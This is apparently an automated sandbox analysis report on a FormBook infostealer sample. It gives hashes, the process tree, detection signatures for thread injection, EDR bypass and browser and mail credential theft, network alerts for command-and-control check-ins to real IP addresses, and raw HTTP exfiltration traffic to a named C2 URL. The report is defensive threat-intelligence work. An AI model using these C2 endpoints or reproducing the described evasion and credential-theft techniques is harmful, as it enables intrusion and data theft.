Edit tour

Windows Analysis Report
18in SPA-198-2024.exe

Overview

General Information

Sample name:	18in SPA-198-2024.exe
Analysis ID:	1545922
MD5:	9ca6ee6dda005563c3d04249c85188e7
SHA1:	cd1a00bc5ff84d7c24a8f06cb84cbf98183e2da2
SHA256:	cfbea36edccb76c40ccc6f01d8cbf2d467533ecb1f3e7c7c709532998518b8d9
Tags:	exeuser-Maciej8910871
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected FormBook

.NET source code contains potential unpacker

AI detected suspicious sample

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Sigma detected: Suspicious Creation with Colorcpl

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

18in SPA-198-2024.exe (PID: 6200 cmdline: "C:\Users\user\Desktop\18in SPA-198-2024.exe" MD5: 9CA6EE6DDA005563C3D04249C85188E7)

18in SPA-198-2024.exe (PID: 5648 cmdline: "C:\Users\user\Desktop\18in SPA-198-2024.exe" MD5: 9CA6EE6DDA005563C3D04249C85188E7)

18in SPA-198-2024.exe (PID: 5816 cmdline: "C:\Users\user\Desktop\18in SPA-198-2024.exe" MD5: 9CA6EE6DDA005563C3D04249C85188E7)

tWcBthnLrDi.exe (PID: 4288 cmdline: "C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

colorcpl.exe (PID: 5840 cmdline: "C:\Windows\SysWOW64\colorcpl.exe" MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)

tWcBthnLrDi.exe (PID: 4508 cmdline: "C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 2284 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000007.00000002.4472767569.0000000005070000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.4474644674.0000000005800000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.2247487130.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.4472840073.00000000050C0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.2248027115.0000000001130000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.4471298397.00000000032F0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.2249648463.0000000002A30000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.4472773196.0000000004020000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Process Memory Space: 18in SPA-198-2024.exe PID: 6200	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.18in SPA-198-2024.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
4.2.18in SPA-198-2024.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious Creation with Colorcpl

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\colorcpl.exe, ProcessId: 5840, TargetFilename: C:\Users\user

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-31T10:25:29.850134+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49794	3.33.130.190	80	TCP
2024-10-31T10:25:53.484655+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49925	141.193.213.10	80	TCP
2024-10-31T10:26:07.234185+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49990	8.210.3.99	80	TCP
2024-10-31T10:26:21.620474+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49994	162.0.215.244	80	TCP
2024-10-31T10:26:35.061657+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49998	162.0.231.203	80	TCP
2024-10-31T10:26:48.869008+0100	2855465	1	A Network Trojan was detected	192.168.2.5	50002	103.71.154.12	80	TCP
2024-10-31T10:27:05.382910+0100	2855465	1	A Network Trojan was detected	192.168.2.5	50006	3.33.130.190	80	TCP
2024-10-31T10:27:25.911153+0100	2855465	1	A Network Trojan was detected	192.168.2.5	50010	3.33.130.190	80	TCP
2024-10-31T10:27:39.344949+0100	2855465	1	A Network Trojan was detected	192.168.2.5	50014	199.59.243.227	80	TCP
2024-10-31T10:27:52.769488+0100	2855465	1	A Network Trojan was detected	192.168.2.5	50018	13.248.169.48	80	TCP
2024-10-31T10:28:10.267399+0100	2855465	1	A Network Trojan was detected	192.168.2.5	50022	38.88.82.56	80	TCP
2024-10-31T10:28:23.783156+0100	2855465	1	A Network Trojan was detected	192.168.2.5	50026	3.33.130.190	80	TCP
2024-10-31T10:28:37.329655+0100	2855465	1	A Network Trojan was detected	192.168.2.5	50030	178.79.184.196	80	TCP
2024-10-31T10:28:59.731611+0100	2855465	1	A Network Trojan was detected	192.168.2.5	50034	188.114.97.3	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-31T10:25:45.839086+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49881	141.193.213.10	80	TCP
2024-10-31T10:25:48.386072+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49893	141.193.213.10	80	TCP
2024-10-31T10:25:50.936091+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49910	141.193.213.10	80	TCP
2024-10-31T10:25:59.562277+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49957	8.210.3.99	80	TCP
2024-10-31T10:26:02.124821+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49969	8.210.3.99	80	TCP
2024-10-31T10:26:04.702893+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49983	8.210.3.99	80	TCP
2024-10-31T10:26:14.284162+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49991	162.0.215.244	80	TCP
2024-10-31T10:26:16.850214+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49992	162.0.215.244	80	TCP
2024-10-31T10:26:19.271392+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49993	162.0.215.244	80	TCP
2024-10-31T10:26:27.435680+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49995	162.0.231.203	80	TCP
2024-10-31T10:26:29.977737+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49996	162.0.231.203	80	TCP
2024-10-31T10:26:32.504852+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49997	162.0.231.203	80	TCP
2024-10-31T10:26:41.109578+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49999	103.71.154.12	80	TCP
2024-10-31T10:26:43.657571+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50000	103.71.154.12	80	TCP
2024-10-31T10:26:46.202867+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50001	103.71.154.12	80	TCP
2024-10-31T10:26:54.560825+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50003	3.33.130.190	80	TCP
2024-10-31T10:26:57.104935+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50004	3.33.130.190	80	TCP
2024-10-31T10:26:59.656184+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50005	3.33.130.190	80	TCP
2024-10-31T10:27:11.937433+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50007	3.33.130.190	80	TCP
2024-10-31T10:27:13.589674+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50008	3.33.130.190	80	TCP
2024-10-31T10:27:17.033583+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50009	3.33.130.190	80	TCP
2024-10-31T10:27:31.711507+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50011	199.59.243.227	80	TCP
2024-10-31T10:27:34.219720+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50012	199.59.243.227	80	TCP
2024-10-31T10:27:36.804170+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50013	199.59.243.227	80	TCP
2024-10-31T10:27:45.153650+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50015	13.248.169.48	80	TCP
2024-10-31T10:27:47.693731+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50016	13.248.169.48	80	TCP
2024-10-31T10:27:50.182732+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50017	13.248.169.48	80	TCP
2024-10-31T10:28:02.645896+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50019	38.88.82.56	80	TCP
2024-10-31T10:28:05.192395+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50020	38.88.82.56	80	TCP
2024-10-31T10:28:07.737741+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50021	38.88.82.56	80	TCP
2024-10-31T10:28:17.031611+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50023	3.33.130.190	80	TCP
2024-10-31T10:28:19.579694+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50024	3.33.130.190	80	TCP
2024-10-31T10:28:21.236330+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50025	3.33.130.190	80	TCP
2024-10-31T10:28:29.721680+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50027	178.79.184.196	80	TCP
2024-10-31T10:28:32.311831+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50028	178.79.184.196	80	TCP
2024-10-31T10:28:34.780896+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50029	178.79.184.196	80	TCP
2024-10-31T10:28:51.619707+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50031	188.114.97.3	80	TCP
2024-10-31T10:28:54.183884+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50032	188.114.97.3	80	TCP
2024-10-31T10:28:56.772009+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50033	188.114.97.3	80	TCP

HTTP traffic detected: POST /9g6s/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.5Content-Type: application/x-www-form-urlencodedContent-Length: 205Cache-Control: no-cacheConnection: closeHost: www.meanttobebroken.orgOrigin: http://www.meanttobebroken.orgReferer: http://www.meanttobebroken.org/9g6s/User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2Data Raw: 31 5a 67 6c 3d 6f 39 2f 65 75 4a 74 44 6f 41 32 50 33 38 78 61 56 58 70 54 4d 32 43 77 6b 59 4c 68 72 58 76 6f 55 4f 45 7a 71 65 42 4c 34 4e 36 4f 68 36 67 4c 65 6b 77 71 61 46 4b 41 66 59 67 70 36 38 47 72 75 39 64 73 63 7a 79 58 4f 55 36 35 70 6c 6a 55 69 76 67 4b 4d 6f 34 73 51 6f 39 2f 4d 39 32 36 5a 73 42 71 32 4a 78 67 65 50 43 6e 49 4b 43 71 63 44 4e 35 6b 70 4e 6d 6a 4b 37 30 63 48 4c 46 63 32 61 65 72 2f 48 43 31 4d 4a 75 61 42 52 51 37 34 58 70 39 55 45 4f 68 37 4e 59 37 4e 36 57 62 58 6d 74 73 76 65 4e 39 54 46 6a 53 46 7a 41 57 2f 6b 44 4f 34 37 4a 4e 47 6b 5a 4e 34 51 2b 75 72 67 76 4d 36 45 3d Data Ascii: 1Zgl=o9/euJtDoA2P38xaVXpTM2CwkYLhrXvoUOEzqeBL4N6Oh6gLekwqaFKAfYgp68Gru9dsczyXOU65pljUivgKMo4sQo9/M926ZsBq2JxgePCnIKCqcDN5kpNmjK70cHLFc2aer/HC1MJuaBRQ74Xp9UEOh7NY7N6WbXmtsveN9TFjSFzAW/kDO47JNGkZN4Q+urgvM6E=

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 31 Oct 2024 09:25:45 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingVary: Accept-Encodingx-powered-by: WP EngineExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://meanttobebroken.org/wp-json/>; rel="https://api.w.org/"CF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 8db299807a8ae7bf-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 31 36 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d4 3c db 72 db 38 96 cf f6 57 c0 4c 8d 2d 4e 78 d7 c5 b6 24 3a dd 49 a7 a7 b2 db e9 f4 76 9c 9a da 8a 53 2e 88 84 28 d8 24 c1 06 20 cb 1a b5 5e f6 2f f6 69 7f 71 3f 61 eb 00 94 44 c9 94 ac d8 9e dd da 54 b7 6d 02 e7 8e 73 0e 6e 3c ec 1f c5 2c 92 d3 82 a0 91 cc d2 8b c3 3e fc 42 29 ce 93 d0 20 b9 fd e5 b3 01 6d 04 c7 17 87 07 fd 8c 48 8c a2 11 e6 82 c8 d0 f8 72 f9 b3 7d 66 2c db 73 9c 91 d0 b8 a3 64 52 30 2e 0d 14 b1 5c 92 5c 86 c6 84 c6 72 14 c6 e4 8e 46 c4 56 0f 16 a2 39 95 14 a7 b6 88 70 4a 42 5f 51 49 69 7e 8b 38 49 43 a3 e0 6c 48 53 62 a0 11 27 c3 d0 18 49 59 88 ae eb 26 59 91 38 8c 27 ee fd 30 77 fd 4d 24 21 a7 29 11 23 42 e4 26 de 58 10 07 54 bc a5 d2 c9 89 74 59 cc 4e 87 f4 c6 89 84 30 2e 0e d7 88 e0 a2 48 89 2d d9 38 1a d9 34 62 b9 81 04 fd 07 11 a1 e1 9f 79 f7 fe 99 57 25 dd 75 dd 8c e0 5c 4a 36 20 03 ce 6e 49 ae 84 9b 14 76 a9 ba 2b 47 24 23 c2 c5 64 90 49 39 70 87 f8 0e 68 ba 9b 4c 9c 22 4f 36 94 d1 bc 41 e8 d0 a0 19 4e 88 0b 30 0b 61 9a c1 7d 33 78 11 51 ca df b6 a2 f8 dd 72 f8 9d 7b bf f3 a2 72 28 8a 35 72 64 38 a7 43 22 e4 8b 30 13 54 12 67 42 06 4b a2 9b bc c4 6d 39 f8 2f c1 0c 0f 31 a7 76 41 f3 9c c4 b6 c4 03 47 dc 25 10 1d 29 e3 a1 f1 aa 3d 18 e0 b8 bd 19 45 99 00 1f a1 11 96 94 e5 f6 25 4d c9 3b 80 af 04 d5 ab e1 30 6a 79 f1 26 a2 12 c2 8e 1e 02 c3 3f e5 ec 07 fd 23 db 46 7f 63 2c 49 09 ba c4 09 fa 88 73 9c 10 8e 6c fb e2 10 21 84 fa 22 e2 b4 90 17 8d e1 38 8f 80 7f 63 62 c5 96 b0 52 8b 9a b3 c9 d7 f4 5b 08 3f fe fc f3 eb b7 1e fc e1 14 63 31 6a cc 4e 12 99 39 42 62 2e 4f ba 8a 4c 4e 26 e8 27 2c 49 c3 74 12 22 2f 69 46 1a a6 45 ee 48 2e bb 0a f6 46 9c cc cd de 1d e6 68 18 c6 00 f2 3e 25 19 c9 a5 78 3b bd c4 c9 af 38 23 0d 61 7e f5 be 59 8a da 4d 18 3b 11 27 58 92 12 ac 21 4c 2b 4e c3 f4 28 3c 89 b1 c4 bf e0 29 e1 27 6f 4e 8e d3 f0 e4 75 da 3d 39 e9 dd 38 58 4c f3 28 94 7c 4c 7a 37 8e e0 51 a8 28 9d 2c b2 c2 64 32 71 12 65 06 89 93 4c 1b c1 89 58 e6 6a e9 de d0 38 3c 79 4d 5f c7 69 6f e8 14 98 93 5c fe ca 62 e2 d0 5c 10 2e df 92 21 e3 a4 71 63 0d cd 9e 22 3b 37 1b 13 9a c7 6c 62 c5 2c 1a 83 84 d6 89 36 e4 89 55 91 d0 3a f9 db e5 47 fb e3 bf fe db e9 d9 df 4f Data Ascii: 16ef<r8WL-Nx$:IvS.($ ^/iq?aDTmsn<,>B) mHr}f,sdR0.\\rFV9pJB_QIi~8IClHSb'IY&Y8'0wM$!)#B&XTtYN0.H-84byW%u\J6 nIv+G
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 31 Oct 2024 09:25:48 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingVary: Accept-Encodingx-powered-by: WP EngineExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://meanttobebroken.org/wp-json/>; rel="https://api.w.org/"CF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 8db2999068662d29-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 31 36 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d4 3c db 72 db 38 96 cf f6 57 c0 4c 8d 2d 4e 78 d7 c5 b6 24 3a dd 49 a7 a7 b2 db e9 f4 76 9c 9a da 8a 53 2e 88 84 28 d8 24 c1 06 20 cb 1a b5 5e f6 2f f6 69 7f 71 3f 61 eb 00 94 44 c9 94 ac d8 9e dd da 54 b7 6d 02 e7 8e 73 0e 6e 3c ec 1f c5 2c 92 d3 82 a0 91 cc d2 8b c3 3e fc 42 29 ce 93 d0 20 b9 fd e5 b3 01 6d 04 c7 17 87 07 fd 8c 48 8c a2 11 e6 82 c8 d0 f8 72 f9 b3 7d 66 2c db 73 9c 91 d0 b8 a3 64 52 30 2e 0d 14 b1 5c 92 5c 86 c6 84 c6 72 14 c6 e4 8e 46 c4 56 0f 16 a2 39 95 14 a7 b6 88 70 4a 42 5f 51 49 69 7e 8b 38 49 43 a3 e0 6c 48 53 62 a0 11 27 c3 d0 18 49 59 88 ae eb 26 59 91 38 8c 27 ee fd 30 77 fd 4d 24 21 a7 29 11 23 42 e4 26 de 58 10 07 54 bc a5 d2 c9 89 74 59 cc 4e 87 f4 c6 89 84 30 2e 0e d7 88 e0 a2 48 89 2d d9 38 1a d9 34 62 b9 81 04 fd 07 11 a1 e1 9f 79 f7 fe 99 57 25 dd 75 dd 8c e0 5c 4a 36 20 03 ce 6e 49 ae 84 9b 14 76 a9 ba 2b 47 24 23 c2 c5 64 90 49 39 70 87 f8 0e 68 ba 9b 4c 9c 22 4f 36 94 d1 bc 41 e8 d0 a0 19 4e 88 0b 30 0b 61 9a c1 7d 33 78 11 51 ca df b6 a2 f8 dd 72 f8 9d 7b bf f3 a2 72 28 8a 35 72 64 38 a7 43 22 e4 8b 30 13 54 12 67 42 06 4b a2 9b bc c4 6d 39 f8 2f c1 0c 0f 31 a7 76 41 f3 9c c4 b6 c4 03 47 dc 25 10 1d 29 e3 a1 f1 aa 3d 18 e0 b8 bd 19 45 99 00 1f a1 11 96 94 e5 f6 25 4d c9 3b 80 af 04 d5 ab e1 30 6a 79 f1 26 a2 12 c2 8e 1e 02 c3 3f e5 ec 07 fd 23 db 46 7f 63 2c 49 09 ba c4 09 fa 88 73 9c 10 8e 6c fb e2 10 21 84 fa 22 e2 b4 90 17 8d e1 38 8f 80 7f 63 62 c5 96 b0 52 8b 9a b3 c9 d7 f4 5b 08 3f fe fc f3 eb b7 1e fc e1 14 63 31 6a cc 4e 12 99 39 42 62 2e 4f ba 8a 4c 4e 26 e8 27 2c 49 c3 74 12 22 2f 69 46 1a a6 45 ee 48 2e bb 0a f6 46 9c cc cd de 1d e6 68 18 c6 00 f2 3e 25 19 c9 a5 78 3b bd c4 c9 af 38 23 0d 61 7e f5 be 59 8a da 4d 18 3b 11 27 58 92 12 ac 21 4c 2b 4e c3 f4 28 3c 89 b1 c4 bf e0 29 e1 27 6f 4e 8e d3 f0 e4 75 da 3d 39 e9 dd 38 58 4c f3 28 94 7c 4c 7a 37 8e e0 51 a8 28 9d 2c b2 c2 64 32 71 12 65 06 89 93 4c 1b c1 89 58 e6 6a e9 de d0 38 3c 79 4d 5f c7 69 6f e8 14 98 93 5c fe ca 62 e2 d0 5c 10 2e df 92 21 e3 a4 71 63 0d cd 9e 22 3b 37 1b 13 9a c7 6c 62 c5 2c 1a 83 84 d6 89 36 e4 89 55 91 d0 3a f9 db e5 47 fb e3 bf fe db e9 d9 df 4f Data Ascii: 16e5<r8WL-Nx$:IvS.($ ^/iq?aDTmsn<,>B) mHr}f,sdR0.\\rFV9pJB_QIi~8IClHSb'IY&Y8'0wM$!)#B&XTtYN0.H-84byW%u\J6 nIv+G
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 31 Oct 2024 09:25:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingVary: Accept-Encodingx-powered-by: WP EngineExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://meanttobebroken.org/wp-json/>; rel="https://api.w.org/"CF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 8db299a049526c7f-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 31 36 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d4 3c db 72 db 38 96 cf f6 57 c0 4c 8d 2d 4e 78 d7 c5 b6 24 3a dd 49 a7 a7 b2 db e9 f4 76 9c 9a da 8a 53 2e 88 84 28 d8 24 c1 06 20 cb 1a b5 5e f6 2f f6 69 7f 71 3f 61 eb 00 94 44 c9 94 ac d8 9e dd da 54 b7 6d 02 e7 8e 73 0e 6e 3c ec 1f c5 2c 92 d3 82 a0 91 cc d2 8b c3 3e fc 42 29 ce 93 d0 20 b9 fd e5 b3 01 6d 04 c7 17 87 07 fd 8c 48 8c a2 11 e6 82 c8 d0 f8 72 f9 b3 7d 66 2c db 73 9c 91 d0 b8 a3 64 52 30 2e 0d 14 b1 5c 92 5c 86 c6 84 c6 72 14 c6 e4 8e 46 c4 56 0f 16 a2 39 95 14 a7 b6 88 70 4a 42 5f 51 49 69 7e 8b 38 49 43 a3 e0 6c 48 53 62 a0 11 27 c3 d0 18 49 59 88 ae eb 26 59 91 38 8c 27 ee fd 30 77 fd 4d 24 21 a7 29 11 23 42 e4 26 de 58 10 07 54 bc a5 d2 c9 89 74 59 cc 4e 87 f4 c6 89 84 30 2e 0e d7 88 e0 a2 48 89 2d d9 38 1a d9 34 62 b9 81 04 fd 07 11 a1 e1 9f 79 f7 fe 99 57 25 dd 75 dd 8c e0 5c 4a 36 20 03 ce 6e 49 ae 84 9b 14 76 a9 ba 2b 47 24 23 c2 c5 64 90 49 39 70 87 f8 0e 68 ba 9b 4c 9c 22 4f 36 94 d1 bc 41 e8 d0 a0 19 4e 88 0b 30 0b 61 9a c1 7d 33 78 11 51 ca df b6 a2 f8 dd 72 f8 9d 7b bf f3 a2 72 28 8a 35 72 64 38 a7 43 22 e4 8b 30 13 54 12 67 42 06 4b a2 9b bc c4 6d 39 f8 2f c1 0c 0f 31 a7 76 41 f3 9c c4 b6 c4 03 47 dc 25 10 1d 29 e3 a1 f1 aa 3d 18 e0 b8 bd 19 45 99 00 1f a1 11 96 94 e5 f6 25 4d c9 3b 80 af 04 d5 ab e1 30 6a 79 f1 26 a2 12 c2 8e 1e 02 c3 3f e5 ec 07 fd 23 db 46 7f 63 2c 49 09 ba c4 09 fa 88 73 9c 10 8e 6c fb e2 10 21 84 fa 22 e2 b4 90 17 8d e1 38 8f 80 7f 63 62 c5 96 b0 52 8b 9a b3 c9 d7 f4 5b 08 3f fe fc f3 eb b7 1e fc e1 14 63 31 6a cc 4e 12 99 39 42 62 2e 4f ba 8a 4c 4e 26 e8 27 2c 49 c3 74 12 22 2f 69 46 1a a6 45 ee 48 2e bb 0a f6 46 9c cc cd de 1d e6 68 18 c6 00 f2 3e 25 19 c9 a5 78 3b bd c4 c9 af 38 23 0d 61 7e f5 be 59 8a da 4d 18 3b 11 27 58 92 12 ac 21 4c 2b 4e c3 f4 28 3c 89 b1 c4 bf e0 29 e1 27 6f 4e 8e d3 f0 e4 75 da 3d 39 e9 dd 38 58 4c f3 28 94 7c 4c 7a 37 8e e0 51 a8 28 9d 2c b2 c2 64 32 71 12 65 06 89 93 4c 1b c1 89 58 e6 6a e9 de d0 38 3c 79 4d 5f c7 69 6f e8 14 98 93 5c fe ca 62 e2 d0 5c 10 2e df 92 21 e3 a4 71 63 0d cd 9e 22 3b 37 1b 13 9a c7 6c 62 c5 2c 1a 83 84 d6 89 36 e4 89 55 91 d0 3a f9 db e5 47 fb e3 bf fe db e9 d9 df 4f Data Ascii: 16ef<r8WL-Nx$:IvS.($ ^/iq?aDTmsn<,>B) mHr}f,sdR0.\\rFV9pJB_QIi~8IClHSb'IY&Y8'0wM$!)#B&XTtYN0.H-84byW%u\J6 nIv+G
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Thu, 31 Oct 2024 09:26:19 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 05 a4 de ee d9 d5 0d 49 80 84 24 10 20 1c 8e 13 42 77 74 45 77 d8 f0 03 f9 35 fc 64 2e d1 dd d3 34 d3 7d 66 d6 e1 1f ae f9 d1 a8 2e 59 59 99 5f 66 d6 64 d6 6f bf fd f6 f8 4f dc 82 5d 99 2a 3f 08 aa 24 fe f6 db e3 f3 9f 01 68 8f 81 6b 39 df 7e bb fc 4c dc ca 02 33 aa fc de 3d d6 61 f3 74 c7 66 69 e5 a6 d5 7d 75 ca dd bb 81 fd fc f5 74 57 b9 5d 05 f7 24 fe 32 b0 03 ab 28 dd ea a9 ae bc 7b f2 ee 53 3a 96 1d b8 f7 fd fa 22 8b af 08 a5 d9 bd dd 0f 7d ba 50 2d 2c 3f b1 fe 91 15 7c 97 87 85 5b 5e 2d 41 de 51 4f ad c4 7d ba 6b 42 b7 cd b3 a2 ba 9a d6 86 4e 15 3c 39 6e 13 da ee fd e5 e3 cb 20 4c c3 2a b4 e2 fb d2 b6 62 f7 09 fd fa 9d 54 15 56 b1 fb 8d 40 88 81 92 55 83 49 56 a7 ce 23 fc dc f9 2c ca b2 3a c5 ee a0 97 db 8b b8 ec b2 7c e1 a3 17 f5 3e 73 4e 83 bf 5f a6 f6 9f 7d f3 80 74 ee 3d 2b 09 e3 d3 c3 80 2e c0 b6 5f 06 a2 1b 37 6e 15 da d6 97 41 69 a5 e5 7d e9 16 a1 f7 97 1f 97 95 e1 d9 7d 18 a0 44 de bd 1f 8c c3 d4 bd 0f dc d0 0f 2a 30 fc 95 c0 c8 e1 18 25 30 ea fd ac bd 65 47 7e d1 9f 01 a8 28 ce 8a 87 c1 3f 7b 97 f6 7e da eb 18 36 c1 31 1c 79 3f 96 5b 8e 13 a6 fe c3 e0 a6 3f b1 0a 3f 4c df 75 ff e7 77 f6 4b d7 ae c2 2c fd 02 8e 9e 55 6e 71 23 0f 27 2c f3 d8 02 b2 d8 c7 99 1d fd 1f 6c f7 b5 c7 9f 05 24 72 bb d3 33 93 f7 b1 eb 01 29 59 75 95 bd df ec 65 